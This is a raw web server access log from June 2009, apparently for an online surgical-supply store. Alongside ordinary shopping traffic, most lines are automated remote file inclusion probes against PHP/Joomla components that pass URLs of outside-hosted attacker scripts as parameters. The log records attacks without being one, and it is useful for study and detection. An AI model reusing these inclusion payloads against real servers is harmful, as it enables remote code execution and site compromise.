219.94.194.231 - - [21/Jun/2009:08:31:39 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:31:40 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:31:58 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.106.252.92 - - [21/Jun/2009:08:32:00 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:01 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:01 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:01 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:02 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:02 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:02 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:32:02 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.147.30.80 - - [21/Jun/2009:08:32:24 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:32:25 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:08:32:26 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:26 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:27 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:32:27 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:08:32:33 -0400] "GET /?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:08:32:33 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.17.129.100 - - [21/Jun/2009:08:32:33 -0400] "GET /logs/?sourcedir=http://www.elettrostudio.ch/fr//copyright[1].txt??? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:32:46 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.59.178 - - [21/Jun/2009:08:32:51 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
65.98.59.178 - - [21/Jun/2009:08:32:51 -0400] "GET //include/bbs.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.811"
65.98.59.178 - - [21/Jun/2009:08:32:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
219.94.194.231 - - [21/Jun/2009:08:32:55 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:55 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:56 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:56 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:32:58 -0400] "GET /logs/access_log.Q109052800//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.98.59.178 - - [21/Jun/2009:08:33:10 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
219.94.194.231 - - [21/Jun/2009:08:33:16 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:33:16 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:33:49 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:33:49 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:33:50 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
65.98.59.178 - - [21/Jun/2009:08:34:07 -0400] "GET //include/bbs.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.811"
209.59.12.99 - - [21/Jun/2009:08:34:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.94.194.231 - - [21/Jun/2009:08:34:35 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.222.115.26 - - [21/Jun/2009:08:34:48 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64808 "http://www.acesurgical.com/trufix_sizes.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:52 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:53 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:34:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
219.94.194.231 - - [21/Jun/2009:08:34:58 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
121.222.115.26 - - [21/Jun/2009:08:35:22 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45419001 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:22 -0400] "GET /images/items/45419001_FULL.JPG HTTP/1.1" 200 9069 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45419001" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:35 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45417901 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [21/Jun/2009:08:35:35 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.222.115.26 - - [21/Jun/2009:08:35:36 -0400] "GET /images/items/45417901_FULL.JPG HTTP/1.1" 200 9747 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45417901" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:46 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45415001 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:46 -0400] "GET /images/items/45415001_FULL.JPG HTTP/1.1" 200 7917 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45415001" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:53 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45415201 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:35:53 -0400] "GET /images/items/45415201_FULL.JPG HTTP/1.1" 200 7233 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45415201" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [21/Jun/2009:08:35:58 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.222.115.26 - - [21/Jun/2009:08:36:09 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45427202 HTTP/1.1" 200 27015 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:36:10 -0400] "GET /images/items/TRUSCREWS_FULL.JPG HTTP/1.1" 200 12009 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45427202" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [21/Jun/2009:08:36:15 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.222.115.26 - - [21/Jun/2009:08:36:41 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [21/Jun/2009:08:36:41 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
121.222.115.26 - - [21/Jun/2009:08:36:41 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:36:41 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:36:41 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:36:43 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45418015 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.222.115.26 - - [21/Jun/2009:08:36:44 -0400] "GET /images/items/45418015_FULL.JPG HTTP/1.1" 200 16075 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L509D66428DF282006CFF044+WSEQ(S0060):1+OUITEM(A0200):45418015" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
217.147.30.80 - - [21/Jun/2009:08:36:48 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:37:35 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:37:35 -0400] "GET /phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:37:38 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:38:03 -0400] "GET /phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:38:05 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:38:06 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:38:08 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.94.194.231 - - [21/Jun/2009:08:38:23 -0400] "GET /logs/access_log.Q109053100//citywriter/head.php?path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:38:24 -0400] "GET //citywriter/head.php?path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:38:24 -0400] "GET /logs//citywriter/head.php?path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
219.94.194.231 - - [21/Jun/2009:08:38:34 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://67.15.84.42/~spencerg/modules/.log/safe?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:08:38:36 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:08:38:57 -0400] "GET /images/nav_store_ckout_orng.jpg HTTP/1.1" 200 1266 "-" "Googlebot-Image/1.0"
217.147.30.80 - - [21/Jun/2009:08:39:12 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:14 -0400] "GET /phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:39:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [21/Jun/2009:08:39:24 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:36 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:39 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:44 -0400] "GET /phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:55 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:55 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:39:59 -0400] "GET /phphtml.php?htmlclass_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:40:29 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:08:40:53 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ss-shop.ru/statdir/id/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
91.121.112.152 - - [21/Jun/2009:08:41:04 -0400] "GET /logs/access_log.Q109052500//index.php?pagina=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
